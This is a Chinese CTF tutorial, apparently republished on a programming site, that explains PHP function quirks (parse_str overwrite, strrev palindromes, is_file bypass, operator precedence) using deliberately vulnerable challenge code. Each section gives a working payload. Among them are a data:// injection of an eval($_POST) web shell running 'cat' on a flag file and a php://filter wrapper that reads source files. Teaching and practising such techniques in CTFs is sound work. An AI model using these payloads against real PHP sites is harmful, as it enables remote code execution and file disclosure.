CTF中的PHP特性函数解析之下篇

作者:XINO 时间:2023-06-14 09:54:52 

前言

上篇文章讲的进阶一些的PHP特性不知道大家吸收的怎么样了,今天作为本PHP特性函数的最后一篇,我也会重点介绍一些有趣的PHP特性以及利用方法,下面开始我们今天的内容分享。

parse_str

CTF中的PHP特性函数解析之下篇

parse_str()这个函数会把查询字符串解析到变量中。那么我们如何利用它的特性呢,我们看下面的例子:

<?php
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
if(isset($_POST['v1'])){
   $v1 = $_POST['v1'];
   $v3 = $_GET['v3'];
      parse_str($v1,$v2);
      if($v2['flag']==md5($v3)){
          echo $flag;
      }
} ?>

分析一下代码要求我们什么,看最后要我们数组v2等于md5(v3),而根据上面代码v2则是由该函数经过v1后赋值给的,那我们解题的思路就有了,利用parse_str() 函数的特点将v2[flag]的值覆盖,那么具体要怎样做呢?

先对数字5进行md5加密:

<?php
$b=md5('5');
echo $b;// e4da3b7fbbce2345d7772b0674a318d5
?>

之后再从v1传入我们的值即可完成绕过:

Payload:
GET:v3=5
POST: v1=flag=e4da3b7fbbce2345d7772b0674a318d5

strrev

CTF中的PHP特性函数解析之下篇

这个函数还是很好理解的,就是将字符串进行翻转,曾经遇到过考察这个的题目觉得很有趣分享给大家,我们先看代码:

highlight_file(__FILE__);
   $file = $_POST['file'];
   if(isset($file)){
       if(strrev($file)==$file){
           include $file;
       }

代码很简单,第一个是高亮代码没有什么用,要我们传入file而且要使回文数等于它本身并且还要考虑如何进行攻击,是不是不太好想,这里使用php里面的data协议,该协议可以进行写入数据,而且?>闭合后可以加任意字符不会受别的影响。于是我们构造代码:

data://text/plain,<?php eval($_POST[1]);?>>?;)]1[TSOP_$(lave php?<,nialp/txet//:atad&1=echo `cat /f1agaaa`;

可以看到思路还是挺巧妙的。

is_file

CTF中的PHP特性函数解析之下篇

该函数检测是不是一个常规的文件类型,在CTF中也出过绕过这个函数的题目,下面我们先看看代码:

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($file){
   if(preg_match('/../|http|https|data|input|rot13|base64|string/i',$file)){
       die("hacker!");
   }else{
       return $file;
   }
}
$file=$_GET['file'];
if(! is_file($file)){
   highlight_file(filter($file));
}else{
   echo "hacker!";
} ?>

分析一下filter函数过滤了很多关键字符串对我们的输入进行限制,最后还不能让is_file检测出来是文件,那我们要怎样读取flag.php文件呢,看最后有个高亮file的操作,这里就是利用点,我们要让其等于flag文件,于是需要绕过:

这里 根据特性is_file不会识别php伪协议,于是我们构造下面代码:

php://filter/read=convert.quoted-printable-encode/resource=flag.php

这样传入即可绕过检测。

优先级问题

在php里存在以下优先级特性:

&&与||的优先级高于=,而&&优先级高于||

=的优先级高于and与or

这里也可以作为考点来考,我们看下面代码:

<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){
   $username = (String)$_GET['username'];
   $password = (String)$_GET['password'];
   $code = (String)$_GET['code'];
   if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin"){
       if($code == 'admin'){
           echo $flag;
       }
   }
}

我们需要传入三个参数,之后进行类型的强制转换,再通过判断语句,最后需要code参数等于admin方可解题,根据优先级原则,所以当第一个判断条件为true时,直接跳过第二个条件然后判断第三个条件,可能有一些绕,只要username=admin为真值,code=admin输出flag,于是构造payload:

?code=admin&password=1&username=admin

来源:https://juejin.cn/post/7177373916879388731

标签:CTF,PHP,特性函数
0
投稿

猜你喜欢

  • python爬取代理ip的示例

    2022-01-20 11:41:12
  • 将python代码和注释分离的方法

    2022-04-06 12:04:50
  • python中怎么表示空值

    2022-02-09 23:59:02
  • PHP检查端口是否可以被绑定的方法示例

    2024-05-13 09:26:32
  • python3.x实现base64加密和解密

    2023-12-17 00:30:33
  • 超级实用的8个Python列表技巧

    2021-01-14 06:27:12
  • Python pip替换为阿里源的方法步骤

    2023-07-19 15:39:23
  • ASP开发中有用的函数(function)集合(1)

    2008-10-14 17:10:00
  • 在python中利用dict转json按输入顺序输出内容方式

    2021-10-26 15:17:23
  • Python实现简易信息分类存储软件

    2023-08-09 20:45:08
  • 使用实例管理器轻松管理多个MySQL实例

    2009-03-25 17:07:00
  • 15个梦幻的登录页面设计展示

    2009-07-19 14:17:00
  • Python绘制动态的521玫瑰花

    2021-05-05 09:31:03
  • python regex库实例用法总结

    2023-11-02 12:17:27
  • MySQL8新特性之全局参数持久化详解

    2024-01-23 12:17:10
  • 如何使用python爬虫爬取要登陆的网站

    2022-09-07 08:04:46
  • 浅析Python中的序列化存储的方法

    2022-09-28 19:21:26
  • 新版php study根目录下文件夹无法显示的图文解决方法

    2023-11-15 00:44:29
  • 批量更新数据库所有表中字段的内容,中木马后的急救处理

    2024-01-27 21:19:54
  • Dreamweaver定义本地站点

    2010-07-02 16:27:00
  • asp之家 网络编程 m.aspxhome.com